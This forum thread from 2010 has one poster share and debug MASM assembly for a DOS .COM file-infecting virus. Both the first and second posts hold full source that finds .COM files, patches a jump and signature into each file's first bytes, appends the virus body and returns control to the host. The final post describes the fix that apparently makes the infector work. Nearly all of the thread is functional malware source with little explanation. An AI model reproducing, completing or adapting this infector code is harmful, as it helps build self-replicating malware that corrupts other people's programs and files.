CodeGuru Home VC++ / MFC / C++ .NET / C# Visual Basic VB Forums Developer.com
Results 1 to 3 of 3
  1. October 3rd, 2010, 01:06 PM #1
    dumb_terminal
    dumb_terminal is offline Junior Member
    Join Date
    Sep 2010
    Posts
    12

    Infecting COM problem

    Its strictly educational and i mean no harm.
    The theory is as usual
    1. find first file
    2. read first four bytes
    3. store it
    4. replace with 3 byte jump code and a virus signature
    5. go to 100h

    now the infected com seems not be working although it is printing the virus's hello world string, its crashing after that.
    the host file...
    Code:
    c_seg segment 'code'
	org 100h
	assume cs:c_seg, ds:c_seg, es:c_seg
main proc near
start:
	mov ah, 02h
	mov dl, 'Z'
	int 21h
	mov ah, 4ch
	int 21h
main endp
c_seg ends
end start
    This is the virus
    Code:
    c_seg segment 'code'
	org 100h
	assume cs:c_seg
main proc far
start_:
	
	
	mov ax, cs
	mov ds, ax
	mov es, ax
	
	
	
	call fals_proc
	fals_proc proc
	fals_proc endp
	pop bp
	sub bp, offset fals_proc
	
	
	
	; set DTA 
	mov ah, 1Ah
	lea dx, [bp + offset DTA]
	int 21h
	
	
	; find first file
	mov ah, 4eh
	lea dx, [bp + offset first_file]
	mov cx, 7
	int 21h

	
	; preparing full path
	lea di, [bp + offset file_name]
	mov byte ptr[di], '.'
	inc di
	mov byte ptr[di], '\'
	inc di

	
	lea si, [bp + offset DTA + 1Eh]
	rep movsb
	mov byte ptr[di], 0
	
	
	; open file
	mov ah, 3Dh
	mov al, 2
	lea dx, [bp + offset file_name]
	int 21h


	; save handle
	push ax
	;push ax
	pop bx
	;pop [bp + fHandle]

	; read first four bytes
	mov ah, 3Fh
	mov cx, 4
	lea dx, [bp + offset buffer]
	int 21h
	
	;==debug==
	;mov ah, 02h
	;mov dl, byte ptr[bp + offset buffer + 3]
	;int 21h
	
	mov al, byte ptr[bp + offset buffer + 3]
	mov dl, byte ptr [bp + offset vir_sig]
	cmp al, dl
	jne jmp_patchin_
	mov ah, 3Eh
	int 21h
	mov ah, 4ch
	int 21h
	;==debug==	
	
	
	jmp_patchin_:
	; set file pointer to begin
	mov ax, 4200h
	mov cx, 0
	mov dx, 0
	int 21h

	; ===== the jump patch =====
	mov byte ptr[bp + jmp_patch], 0E9h
	mov ax, word ptr[bp + offset DTA + 1Ah] ; the file size
	sub ax, 3
	mov word ptr[bp + jmp_patch + 1], ax
	mov al, vir_sig
	mov byte ptr[bp + jmp_patch + 3], al
	mov ah, 40h
	mov cx, 4
	lea dx, [bp + offset jmp_patch]
	int 21h

	

        ; append the virus
	mov ax, 4202h
	mov cx, 0
	mov dx, 0
	int 21h
	
	 
	

	mov ah, 40h
	mov cx, offset vir_sig - offset start_
	lea dx, [bp + offset start_]
	int 21h
	
	; close
	mov ah, 3Eh
	int 21h

	; restore	
	mov cx, 4
	lea si, [bp + offset buffer]
	mov di, 100h
	rep movsb
	
	mov ah, 09h
	lea dx, [bp + offset infection]
	int 21h
	
	mov ax, 0100h
	jmp ax
	
	;quit_:
	;	mov ah, 4ch
	;	int 21h

	DTA db 43 dup (?)
	first_file db '.\*.COM', 0
	file_name db 255 dup (?)
	extra_buffer db 20 dup (?)
	fHandle    dw ?
	buffer     db 4 dup (?)
	jmp_patch  db 4 dup (?)
	file_len   db 2 dup (?)
	virus_len  dw ?
	infection  db "Hello World$"
	vir_sig db 'Y'	
main endp
c_seg ends
end start_
    At a loss, some one plz help, thanx in advance.
    Reply With Quote Reply With Quote
  2. October 4th, 2010, 01:18 AM #2
    dumb_terminal
    dumb_terminal is offline Junior Member
    Join Date
    Sep 2010
    Posts
    12

    Unhappy Re: Infecting COM problem

    Ok have been able to solve the problem. But now another problem, can't restore control to original host program. I mean copying 4 bytes back to 100h isn't working. Even appended the 4 bytes at the end of file then read from the file and put to 100h, no use, The read and write bytes are completely different can anybody help ??
    Code:
    c_seg segment 'code'
	org 100h
	assume cs:c_seg
main proc near
start_:
	; adjust the segments
	mov ax, cs
	mov ds, ax
	mov es, ax
	
	; getting offsets
	call fals_proc
	fals_proc proc
	fals_proc endp
	pop bp
	sub bp, offset fals_proc
	
	; set DTA 
	mov ah, 1Ah
	lea dx, [bp + offset DTA]
	int 21h
	
	
	; find first file
	mov ah, 4eh
	lea dx, [bp + offset first_file]
	mov cx, 7
	int 21h

	; preparing full path .\*A.COM
	lea di, [bp + offset file_name]
	mov byte ptr[di], '.'
	inc di
	mov byte ptr[di], '\'
	inc di

	lea si, [bp + offset DTA + 1Eh]
	rep movsb
	mov byte ptr[di], 0
	
	
	; open file
	mov ah, 3Dh
	mov al, 2
	lea dx, [bp + offset file_name]
	int 21h


	; save handle
	push ax
	push ax
	pop bx
	pop [bp + fHandle]

	; read first four bytes
	mov ah, 3Fh
	mov cx, 4
	lea dx, [bp + offset buffer]
	int 21h
	
	; if virus signature matches don't infect just quit
	mov al, byte ptr[bp + offset buffer + 3]
	mov dl, byte ptr [bp + offset vir_sig]
	cmp al, dl
	jne jmp_patchin_
	mov ah, 3Eh
	int 21h
	mov ah, 09h
	lea dx, [bp + offset infection]
	int 21h
	cmp bp, 0
	je quitzz_
	jmp dispatcher_
	quitzz_:
	mov ah, 4ch
	int 21h

	jmp_patchin_:
	; set file pointer to begin
	mov ax, 4200h
	mov cx, 0
	mov dx, 0
	int 21h

	; ===== the jump patch =====
	mov byte ptr[bp + jmp_patch], 0E9h
	mov ax, word ptr[bp + offset DTA + 1Ah] ; the file size
	sub ax, 3
	mov word ptr[bp + jmp_patch + 1], ax
	mov al, vir_sig
	mov byte ptr[bp + jmp_patch + 3], al
	mov ah, 40h
	mov cx, 4
	lea dx, [bp + offset jmp_patch]
	int 21h

        ; append the virus
	mov ax, 4202h
	mov cx, 0
	mov dx, 0
	int 21h
	
	mov ah, 40h
	mov cx, offset end_vir - offset main
	lea dx, [bp + offset main]
	int 21h
	
	; append the first 4 byte too
	mov ax, 4202h
	mov cx, 0
	mov dx, 0
	int 21h
	
	mov ah, 40h
	lea dx, [bp + offset buffer]
	mov cx, 4
	int 21h
	
	mov ah, 3eh
	int 21h

	dispatcher_:
	mov ah, 3Dh
	mov al, 02h
	lea dx, [bp + offset file_name]
	int 21h
	mov bx, ax
	
	mov ax, 4202h
	mov cx, 0
	mov dx, 0
	int 21h
	
	; restore the first 4 bit
	mov ah, 3Fh
	lea dx, [bp + offset buffer]
	mov cx, 4
	int 21h
	
	mov cx, 4
	lea si, [bp + offset buffer]
	mov di, 100h
	rep movsb
	
	mov ah, 09h
	lea dx, [bp + offset infection]
	int 21h
	

	mov di, 100h
	mov cx, 4
	loop_1:
		mov ah, 02h
		mov dl, byte ptr[di]
		
		int 21h
	loop loop_1

	lea di, [bp + offset buffer]
	mov cx, 4
	loop_2:
		mov ah, 02h
		mov dl, byte ptr[di]
		int 21h
	loop loop_2
	;mov ah, 01
	;int 21h
	

	; close
	mov ah, 3Eh
	int 21h

	mov ax, 0100h
	jmp ax
	
	;quit_:
	;	mov ah, 4ch
	;	int 21h

	DTA db 43 dup (?)
	first_file db '.\*.COM', 0
	file_name db 255 dup (?)
	extra_buffer db 20 dup (?)
	fHandle    dw ?
	buffer     db 4 dup (0)
	jmp_patch  db 4 dup (0)
	infection  db "Hello World$"
	vir_sig db 'Y'	
main endp
	end_vir label near
c_seg ends
end start_
    Reply With Quote Reply With Quote
  3. October 4th, 2010, 11:45 AM #3
    dumb_terminal
    dumb_terminal is offline Junior Member
    Join Date
    Sep 2010
    Posts
    12

    Resolved Re: Infecting COM problem

    Solved it guyz.. here is what was happening...
    i saved the first 4 bytes to buffer.
    now when i was reading 4 bytes for checking prior infection, i was again reading in buffer. this time buffer was full with the jump patcher and virus signature. then in runtime i was overwriting first 4 byte code with buffer, the same thing - the jump patcher - this caused an infinite loop. while checking for prior infection i read the 4 byte in seperate buffer, that solved the prob guyz.. thanx anyway.
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules




Click Here to Expand Forum to Full Width

Featured